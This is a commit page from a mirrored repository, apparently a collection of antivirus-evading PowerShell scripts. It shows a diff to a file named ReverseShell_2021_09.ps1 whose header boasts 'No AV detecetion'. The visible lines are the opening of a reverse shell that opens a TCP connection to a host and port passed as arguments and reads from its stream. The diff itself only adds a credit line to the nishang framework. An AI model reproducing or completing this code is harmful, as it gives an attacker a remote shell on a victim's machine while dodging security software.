mirror of
https://github.com/tihanyin/PSSW100AVB
synced 2026-06-21 14:11:13 +00:00
Update ReverseShell_2021_09.ps1
This commit is contained in:
committed by
GitHub
parent
e254ab62f2
commit
b4894ac410
@@ -1,4 +1,5 @@
|
||||
#Twitter: @TihanyiNorbert (No AV detecetion 2021 october)
|
||||
#Based on the original nishang Framework written by @nikhil_mitt.
|
||||
$c = New-Object System.Net.Sockets.TCPClient($args[0],$args[1]);
|
||||
$I = $c.GetStream();
|
||||
[byte[]]$U = 0..(2-shl15)|%{0};
|
||||
|
||||
Reference in New Issue
Block a user